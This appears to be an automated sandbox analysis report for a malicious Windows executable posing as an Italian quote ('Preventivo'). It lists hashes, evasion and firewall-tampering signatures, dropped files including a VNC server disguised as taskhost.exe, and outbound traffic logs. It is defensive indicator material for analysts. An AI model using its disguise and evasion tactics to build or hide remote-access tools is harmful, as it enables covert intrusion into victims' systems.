Windows Analysis Report
Preventivo24.01.11.exe

Overview

General Information

Sample name: Preventivo24.01.11.exe
Analysis ID: 1379424
MD5: 32f35b78a3dc5949ce3c99f2981def6b
SHA1: 18a24aa0ac052d31fc5b56f5c0187041174ffc61
SHA256: 0cb44c4f8273750fa40497fca81e850f73927e70b13c8f80cdcfee9d1478e6f3
Tags: exe

Detection

Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Contains VNC / remote desktop functionality (version string found)
Contains functionality to change the wallpaper
Modifies the windows firewall
Uses cmd line tools excessively to alter registry or file data
Uses netsh to modify the Windows network and firewall settings
Binary contains a suspicious time stamp
Checks for available system drives (often done to infect USB drives)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

AV Detection

Source: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\taskhost.exe Virustotal: Detection: 10%
Source: Preventivo24.01.11.exe Virustotal: Detection: 17%
Source: Preventivo24.01.11.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Preventivo24.01.11.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: wininet.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdbD source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdbGCTL source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\Windows-driver-samples-master\video\UVncVirtualDisplay\Release\UVncVirtualDisplay.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, UVncVirtualDisplay.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb! source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\vnchooks.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\Users\rudi\Desktop\git_ultravnc\winvnc\Release\winvnc.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B305000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000002.3219628836.000000000070C000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr
Source: Binary string: C:\Users\rudi\Desktop\ddengine_20\Release\ddengine.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr
Source: Binary string: wininet.pdbUGP source: Preventivo24.01.11.exe, 00000000.00000003.2001663712.0000000009DC9000.00000004.00000020.00020000.00000000.sdmp, shi5398.tmp.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbd source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, powercfg.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr, MSI54C4.tmp.0.dr, MSI5406.tmp.0.dr, MSI54A3.tmp.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\viewer.pdb source: Preventivo24.01.11.exe, 00000000.00000003.1984988924.0000000009DC0000.00000004.00001000.00020000.00000000.sdmp, main1.msi.0.dr
Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: Preventivo24.01.11.exe
Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb0 source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe, 00000007.00000000.2024881140.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000007.00000002.2191085584.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000002.3219378917.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 00000010.00000000.2077749886.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000002.2183908363.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002B.00000000.2176348607.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000000.2176902084.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe, 0000002C.00000002.2210880368.00000000009A9000.00000002.00000001.01000000.00000009.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr
Source: C:\Windows\SysWOW64\msiexec.exe File opened: z:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: x:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: v:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: t:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: r:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: p:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: n:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: l:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: j:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: h:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: f:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: b:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: y:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: w:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: u:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: s:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: q:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: o:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: m:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: k:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: i:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: g:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: e:
Source: C:\Windows\SysWOW64\cmd.exe File opened: c:
Source: C:\Windows\SysWOW64\msiexec.exe File opened: a:
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B46F90 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle, 0_2_00B46F90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B49080 FindFirstFileW,FindClose,CloseHandle,CloseHandle, 0_2_00B49080
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00A05220 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW, 0_2_00A05220
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1D700 FindFirstFileW,GetLastError,FindClose, 0_2_00B1D700
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B68B30 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B68B30
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B1CDD0 FindFirstFileW,FindFirstFileW,FindClose,FindClose, 0_2_00B1CDD0
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B43210 FindFirstFileW,FindClose, 0_2_00B43210
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00AFF570 FindFirstFileW,FindNextFileW,FindClose, 0_2_00AFF570
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53790 FindFirstFileW,FindNextFileW,FindNextFileW,FindClose, 0_2_00B53790
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B53C10 FindFirstFileW,FindClose, 0_2_00B53C10
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B2BFF0 FindFirstFileW,FindClose,FindClose, 0_2_00B2BFF0
Source: C:\Games\viewer.exe Code function: 7_2_0099BC3B FindFirstFileExW, 7_2_0099BC3B
Source: C:\Games\taskhost.exe Code function: 42_2_0059EC90 GetDlgItem,GetModuleFileNameA,_strrchr,FindFirstFileA,SendMessageA,SendMessageA,FindNextFileA,FindClose, 42_2_0059EC90
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe Code function: 0_2_00B52400 GetLogicalDriveStringsW,GetDriveTypeW,Wow64DisableWow64FsRedirection,Wow64RevertWow64FsRedirection, 0_2_00B52400
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\c.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\ddengine.dll
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmd.txt
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\cmmc.cmd
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\
Source: C:\Users\user\Desktop\Preventivo24.01.11.exe File opened: C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\WindowsVolume\Games\

Networking

Source: Traffic Snort IDS: 2834928 ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller) 192.168.2.5:49705 -> 93.184.216.34:80
Source: global traffic TCP traffic: 192.168.2.5:49726 -> 140.228.29.110:5500
Source: Joe Sandbox View IP Address: 93.184.216.34 93.184.216.34
Source: global traffic HTTP traffic detected: GET /onboarding/smskillreader.txt HTTP/1.1
  Host: armmf.adobe.com
  Connection: keep-alive
  Accept-Language: en-US,en;q=0.9
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: no-cors
  Sec-Fetch-Dest: empty
  Accept-Encoding: gzip, deflate, br
  If-None-Match: "78-5faa31cce96da"
  If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
Source: unknown TCP traffic detected without corresponding DNS query: 184.25.164.138
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /download/updates.txt HTTP/1.1
  Accept: */*
  User-Agent: AdvancedInstaller
  Host: www.example.com
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: unknown DNS traffic detected: queries for: www.example.com
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Accept-Ranges: bytes
  Age: 589411
  Cache-Control: max-age=604800
  Content-Type: text/html; charset=UTF-8
  Date: Tue, 23 Jan 2024 11:07:53 GMT
  Expires: Tue, 30 Jan 2024 11:07:53 GMT
  Last-Modified: Tue, 16 Jan 2024 15:24:22 GMT
  Server: ECS (agb/52BB)
  Vary: Accept-Encoding
  X-Cache: 404-HIT
  Content-Length: 1256
Source: shi5398.tmp.0.dr String found in binary or memory: http://.css
Source: shi5398.tmp.0.dr String found in binary or memory: http://.jpg
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: Preventivo24.01.11.exe, 00000000.00000003.2031375134.00000000054EF000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.00000000054EF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: Preventivo24.01.11.exe, Preventivo24.01.11.exe, 00000000.00000003.2031997529.00000000054B3000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033927327.00000000054B4000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.0.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: Preventivo24.01.11.exe, 00000000.00000003.1996726609.0000000005591000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b248e132c788
Source: shi5398.tmp.0.dr String found in binary or memory: http://html4/loose.dtd
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/products/plugin/index.html#download
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B2D6000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe, 0000002A.00000000.2174705873.00000000006E3000.00000002.00000001.01000000.0000000D.sdmp, taskhost.exe.0.dr String found in binary or memory: http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0I
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr, vnchooks.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0R
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, taskhost.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018147463.0000000005565000.00000004.00000020.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000002.2033997046.0000000005566000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://oneocsp.microe
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://s.symcd.com06
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t1.symcb.com/ThawtePCA.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://t2.symcb.com0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcb.com/tl.crt0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://tl.symcd.com0&
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, uvncvirtualdisplay.cat.0.dr, UVncVirtualDisplay.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, vnchooks.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ~.pdf.0.dr String found in binary or memory: http://www.pdf-tools.com
Source: Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B3EA000.00000004.00001000.00020000.00000000.sdmp, Preventivo24.01.11.exe, 00000000.00000003.2018539158.000000000B080000.00000004.00001000.00020000.00000000.sdmp, ddengine.dll.0.dr, viewer.exe.0.dr, powercfg.msi.0.dr String found in binary or memory: https://d.symcb.com/cps0%
